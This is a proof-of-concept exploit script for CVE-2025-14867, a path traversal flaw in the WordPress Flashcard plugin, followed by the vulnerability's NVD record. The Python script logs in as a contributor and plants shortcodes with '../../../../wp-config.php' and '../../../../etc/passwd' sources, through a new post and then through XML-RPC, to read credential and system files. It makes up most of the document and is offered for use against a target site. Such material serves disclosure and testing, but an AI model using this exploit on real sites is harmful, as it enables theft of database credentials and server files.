CVE-2025-14867

# CVE-2025-14867 Path Traversal PoC for WordPress Flashcard Plugin # Authenticated Contributor+ Required import requests import sys from urllib.parse import quote target_url = "http://target-wordpress-site.com" username = "attacker" password = "attacker_password" # Login to WordPress session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } session.post(login_url, data=login_data) # Create post with malicious shortcode post_url = f"{target_url}/wp-admin/post-new.php" headers = {"Content-Type": "application/x-www-form-urlencoded"} # Path traversal to read wp-config.php shortcode = '[flashcard source="../../../../wp-config.php"]' post_data = { "post_title": "CVE-2025-14867 Test", "post_content": shortcode, "post_status": "draft", "publish": "Publish" } response = session.post(post_url, data=post_data, headers=headers) # Alternative: Direct shortcode usage in existing post # Use XML-RPC API for exploitation xmlrpc_url = f"{target_url}/xmlrpc.php" malicious_shortcode = '[flashcard source="../../../../etc/passwd"]' xmlrpc_data = """<?xml version="1.0"?> <methodCall> <methodName>wp.newPost</methodName> <params> <param><value><int>1</int></value></param> <param><value><string>username</string></value></param> <param><value><string>password</string></value></param> <param><value><struct> <member><name>post_type</name><value><string>post</string></value></member> <member><name>post_content</name><value><string>""" + malicious_shortcode + """</string></value></member> </struct></value></param> </params> </methodCall>""" # Send exploit via XML-RPC response = session.post(xmlrpc_url, data=xmlrpc_data, headers=headers) print("Exploit sent. Check the post content for file read results.") print(f"Response status: {response.status_code}")

{"cve": {"id": "CVE-2025-14867", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:57.177", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Flashcard plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 0.9 via the 'source' attribute of the 'flashcard' shortcode. This makes it possible for authenticated attackers, with contributor level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/flashcard/tags/0.9/flashcard.php?marks=73,109#L73", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f4fcc6e5-1f90-41e7-8d5a-2bfe8cbf46fa?source=cve", "source": "[email protected]"}]}}